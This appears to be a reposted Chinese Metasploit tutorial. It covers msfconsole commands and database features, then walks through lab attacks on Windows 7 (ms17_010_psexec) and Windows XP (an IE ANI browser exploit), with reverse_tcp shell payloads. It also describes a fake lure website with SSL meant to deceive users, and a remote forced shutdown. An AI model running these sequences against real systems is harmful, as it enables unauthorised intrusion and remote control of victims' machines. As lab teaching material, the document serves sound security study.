可以理解成MSF中的nc命令，可以使用connect -h查看详细用法。
• connect [options] <host> <port>

用show命令查看msf提供的资源。在根目录下执行的话，由于有些模块资源比较多，需要执行show命令要较长的时间
• show exploits：查看可以使用的exploit
• 除了exploits，还支持all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options。有些选项需要用use使用一个模块后才能使用，比如给show targets。

搜索模块
• 简单搜索：seach ms17_010
• 多条件搜索缩小范围：search name:mysql type:exploit platform:linux

查看模块的信息
• info <module name> 
• 如果用use使用了一个模块，直接输入info即可查看

search找到模块后，用use使用模块
• use exploit/windows/smb/ms08_067_netapi
• 用use使用一个模块后，可以使用 show options查看我们需要配置的选项、使用show targets选择目标主机系统、使用show payloads选择payload、使用show advanced查看高级参数、使用show evasion查看用来做混淆、逃避的模块。
• set/setg： 设置参数，比如要渗透的主机IP、payload等。我们可以用show missing查看没有设置的参数
• setg是设置全局变量，避免每个模块都要输入相同的参数

取消设置参数。unsetg是取消设置的全局变量

设置的参数在下一次启动的时候不会生效，可以用save保存我们使用过程的设置。

检查目标是否真的存在这个漏洞，大部分模块没有check功能

回到msfconsole根目录
• 

开始使用模块
• exploit -j：以后台的方式运行

查看当前已经建立的sessions，说明已经拿到了shell
• sessions -i id 可以进入一个session交互

调用外部的扫描命令，比如openvas
• 

•  

• loadpath： 加载自己的模块 

添加一条路由。比如发往某个子网的流量都通过攻陷的机器发送。

 msf数据库相关

db_status：

• 查看MSF有没有连接上后台数据库。如果没有连上数据库，在终端输入msfdb start后再启动MSF。没有连接上数据库MSF也是可以使用的，只是连接上了的话，我们渗透过程中获取的一些信息可以保存下来，比如目标机器的账号密码信息等。

db_rebuild_cache：

• 这个命令将所有模块信息缓存到数据库中，通过数据库检索效率就高很多了。

db_disconnect：

• 断开数据库连接。

db_connect：

• msf默认连上postgresql的msf数据库。可以用db_connect连接我们指定的数据库。如果要使用配置文件进行连接，默认的数据库配置文件为/usr/share/metasploit-framework/config/database.yml，可以参考这个文件进行编写。

db_nmap：

• 集成在msf中的namp扫描命令。不同的是db_nmap扫描的结果会自动保存到数据库中。
• 可以输入hosts查看扫描到的主机信息
• 如果数据多，可以用 hosts IP 进行过滤；hosts -u 查看up状态的机器；使用  hosts -c 列名[,列名]  指定要看的列；使用 hosts -S 进行搜索，比如hosts -S windows。
• 输入services可以查看主机开放的端口情况

creds：

• 查看扫描出来的密码信息

vulns：

• 查看扫描出来的漏洞信息

loot：

• 有些账号密码我们可能没有获取到明文信息，可是经过加密的hash值，可以用这个显示

db_export/db_import：

• 数据库的导入和导出
• db_export -f /root/msfbak.xml
• nmap导出的也可以导入到msf中
• nmap -A 192.168.1.113 -oX nmap.xml     =>     db_import -f /root/nmap.xml

 Exploit模块

分为Active Exploit和Passive Exploit

Active Exploit

目标提供了某种服务，服务存在漏洞

• use exploit/windows/smb/ms17_010_psexec
• set RHOST 192.168.1.100
• set PAYLOAD windows/shell/reverse_tcp
• set LHOST 192.168.1.1
• set LPORT 4444
• set SMBUSER user1
• set SMBPASS pass1
• exploit

Passive Exploit

被攻击者通常不开放端口或开放端口上的服务没有漏洞，漏洞存在于受害者机器上的客户端软件上。客户端需要访问某些远程服务器上的服务，当它访问的时候，当在服务器上放置了漏洞利用代码，由于客户端程序存在漏洞，服务器也会将这些漏洞利用代码作为响应报文返回给客户端，造成客户端漏洞被利用。

• use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
• set URIPATH /
• set PAYLOAD windows/shell/reverse_tcp
• set LHOST 192.168.1.1
• set PORT 4444
• exploit 

Active Exploit演示

实验机器

• 受害者：Windows 7 旗舰版 6.1.7601 Service Pack 1 Build 7601，关闭Windows7防火墙。IP地址为192.168.171.133
• 攻击者：Kali 4.18.0。IP地址为192.168.171.129

Kali上启动MSF，可以先启动postgresql数据库，防止后面MSF连不上数据库

service postgresql start

我们利用exploit/windows/smb/ms17_010_psexec进行攻击，由于它是基于SMB协议的，我们需要知道目标系统的一个用户账号和密码，适合在已经知道目标系统账号密码并开放SMB端口的情况下进行攻击。

然后设置受害者的IP地址，账号和密码，并设置payload为windows/shell/reverse_tcp。这是一个反弹连接，我们还需要设置目标反弹连接时的IP地址和端口。

  然后输入exploit执行，可以看到已经创建了一个session

通过session -l可以查看已经创建的会话

根据上面的Id，我们可以sessions -i 1进入这个shell

查看一下目标的机器IP

可以看到上面有很多乱码，在Kali的终端中，我们可以设置shell中字符的编码

 这时候就不会是乱码了 

Passive Exploit演示

实验机器

• 受害者：Windows XP SP2 professional。IP地址为192.168.171.135
• 攻击者：Kali 4.18.0。IP地址为192.168.171.129

打开XP的防火墙

这时候用Active的方式进行攻击不会成功，采用Passive方式，构造一个链接，诱使被害者连接，利用浏览器的漏洞。

我们要伪造一个网站，诱使受害者攻击。SRVHOST可以指定为本机的IP地址，我们也可以打开SSL和设置SSL的证书，迷惑有安全意识的用户。

URIPATH是访问的URL地址，可以手动指定，比如192.168.171.129/service，这里我们默认设置为根目录即可。

 然后输入exploit

它不会主动向受害者的机器发送利用代码，而是伪造了一个存在漏洞利用代码的WEB站点，这个站点等待IE版本存在漏洞的用户去访问它，将exploit注入到浏览器进程中，利用浏览器漏洞执行payload

我们在XP机器上用IE浏览器访问这个URL

Kali上已经有了一个sessions，进入这个sessions

 输入以下命令让XP机器关机 

shutdown -s -f -t 0

在XP上就会看到机器正在关机

总结

对开放的服务器一般使用Active的方式，对客户端程序的攻击一般使用Passive的方式

参考资料：

https://www.freebuf.com/column/194412.html

转载于:https://www.cnblogs.com/dogecheng/p/11450423.html

• 点赞
• 收藏
• 分享
• 文章举报